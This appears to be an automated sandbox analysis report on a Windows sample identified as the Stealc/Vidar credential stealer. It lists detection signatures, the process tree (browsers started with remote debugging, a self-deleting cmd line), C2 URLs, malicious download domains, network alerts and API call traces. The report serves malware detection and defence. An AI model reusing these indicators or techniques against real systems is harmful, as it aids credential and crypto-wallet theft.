Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1562232
MD5:	df96c3d0bb84474f4ed6c4206d1bacea
SHA1:	3e846e3a979cfad2df3eadc821fccf48f2cda4fd
SHA256:	dab9fee612125503146e28407ec8631232d6b48d567c902b6743bf2e984048b8
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Monitors registry run keys for changes

PE file has a writeable .text section

Performs DNS queries to domains with low reputation

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6520 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DF96C3D0BB84474F4ED6C4206D1BACEA)

chrome.exe (PID: 6304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 --field-trial-handle=2536,i,5756797432895461405,5854280884996212389,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 7272 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7488 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2316,i,7298558400750836120,13581212135822597317,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 8064 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAAFBFBAAKEC" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 4764 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

msedge.exe (PID: 7524 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7820 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6276 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5252 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6732 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7332 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6736 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199802540894", "https://t.me/fu4chmo"], "Botnet": "93e4f2dec1428009f8bc755e83a21d1b"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author
file.exe	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
file.exe	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
file.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6520	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6520	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6520	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6520	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 6520	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
0.0.file.exe.610000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.0.file.exe.610000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.610000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.610000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.610000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.0.file.exe.610000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.file.exe.64ecc0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6520, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6304, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T11:33:30.384328+0100	2044247	1	Malware Command and Control Activity Detected	49.13.32.95	443	192.168.2.5	49740	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T11:33:32.752858+0100	2051831	1	Malware Command and Control Activity Detected	49.13.32.95	443	192.168.2.5	49746	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T11:33:27.986975+0100	2049087	1	A Network Trojan was detected	192.168.2.5	49734	49.13.32.95	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://b2een.xyz/msvcp140.dll2	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/freebl3.dll	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/softokn3.dll9	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/nss3.dll2	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/sqlo.dllb	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/M	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/nss3.dll	Avira URL Cloud: Label: malware

Found malware configuration

Source: file.exe

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199802540894", "https://t.me/fu4chmo"], "Botnet": "93e4f2dec1428009f8bc755e83a21d1b"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006192A6 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_006192A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00623AB9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00623AB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061B721 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	0_2_0061B721
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C42A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C42A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C424440 PK11_PrivDecrypt,	0_2_6C424440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C3F4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4244C0 PK11_PubEncrypt,	0_2_6C4244C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C4725B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C42A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C42A650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C408670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C408670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C40E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C40E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C44A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C44A730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C450180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C450180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4243B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C4243B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C447C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C447C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C407D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C407D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C44BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6C44BD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C449EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6C449EC0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49998 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.13.32.95:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.147.1:443 -> 192.168.2.5:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.147.1:443 -> 192.168.2.5:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50079 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157843167.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.3149404495.0000000043C92000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.3143576967.0000000037DBA000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157843167.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.0.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00627178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_00627178
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061A941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcatA,lstrcatA,lstrcatA,CopyFileA,_memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0061A941
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00626A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	0_2_00626A05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00611D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00611D70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00627D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00627D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061C528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0061C528
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061E5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0061E5B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00628D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperationA,FindNextFileA,FindClose,	0_2_00628D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061CE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0061CE96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062785A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_0062785A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061C888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0061C888
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061DD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0061DD2A

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00626E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_00626E7F

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]		0_2_0061149D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax		0_2_0061149D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49734 -> 49.13.32.95:443
